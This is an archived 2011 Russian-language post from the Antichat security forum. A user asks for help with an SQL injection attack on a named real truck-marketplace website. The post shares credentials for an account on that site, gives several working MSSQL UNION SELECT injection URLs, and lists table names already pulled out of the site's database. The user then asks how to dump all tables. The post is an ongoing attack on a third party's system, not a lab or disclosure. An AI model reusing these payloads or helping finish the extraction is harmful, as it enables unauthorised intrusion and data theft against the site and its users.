HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

  #11  
Старый 14.03.2011, 00:42
Oza
Познающий
Регистрация: 20.01.2009
Сообщений: 48
Провел на форуме:
159106

Репутация: 9
По умолчанию
Имеется sqli в mssql без вывода ошибки.

Сайт: www.truck market.ru

Перед проведением атаки следует вторизоваться тут: http://www.truckmarket.ru/enter.php. Например по этому акку: login:a1840198 pass:a1840198

sqli:

Цитата:
Сообщение от None  
/reg.php?id=355569+and+1=1
По логике: если запрос верен - в текстбокстах отображается уже имеющаяся инфа.

Ступор на получении списка таблиц. Получаем одну так:

Цитата:
Сообщение от None  
/reg.php?id=355569+union+select+top+1+1,2,3,4,5,6,7 ,cast%28table_name+as+binary%29,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31, 32,33,34+FROM+INFORMATION_SCHEMA.TABLES
Далее пробую сначала брать следующию так:

Цитата:
Сообщение от None  
/reg.php?id=355569+union+select+top+1+1,2,3,4,5,6,7 ,cast%28table_name+as+binary%29,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31, 32,33,34+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABL E_NAME%3E%27mb_spare_ua%27
Цитата:
Сообщение от None  
/reg.php?id=355569+union+select+top+1+1,2,3,4,5,6,7 ,cast%28table_name+as+binary%29,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31, 32,33,34+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABL E_NAME%3E%27mboards%27
Но удается выудить только три, потом идет повтор:

Цитата:
Сообщение от None  
mb_spare_ua
mboards
MbTopics_ForDel
MbTopics_ForDel
...
Цитата:
Сообщение от None  
/reg.php?id=355569+union+select+top+1+1,2,3,4,5,6,7 ,cast%28table_name+as+binary%29,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31, 32,33,34+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABL E_NAME+NOT+IN+('mb_spare_ua','mboards','ATIForums_ Forum')
-- ATIForums_Forum
Опять повтор. Почитал доки. select top - возвращает случайныую запись. Умельцы как-то убирают случайность, добовляя в конец order+by+. Но я не докурил как =(

Подставляя случайные слова в первый методе смог получить вот такой список таблиц:

Цитата:
Сообщение от None  
MbTopics_ForDel
WebService
WebServiceClient
WindRose
mb_spare_ua
mboards
ATIForums_Forum
Кузова
Марки транспорт
RegionCodes
WarnTypes
MSP_TIMEPHASED_DATA --(Вывело MSP_TIMEPHASED_, но гугл указал что это дефолт таблица MSP_TIMEPHASED_DATA)
ways
waysinfo
Как вытащить все таблицы? Мне бы увидеть пример имуляции limit, вывести колонки и инфу думаю смогу сам.

p.s

Проблема с данной уязвимостью, уже постилась на rdot.org

Но 2ва дня не кто помочь не может.
 
Ответить с цитированием
 



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 3 (пользователей: 0 , гостей: 3)
 


Быстрый переход




ANTICHAT.XYZ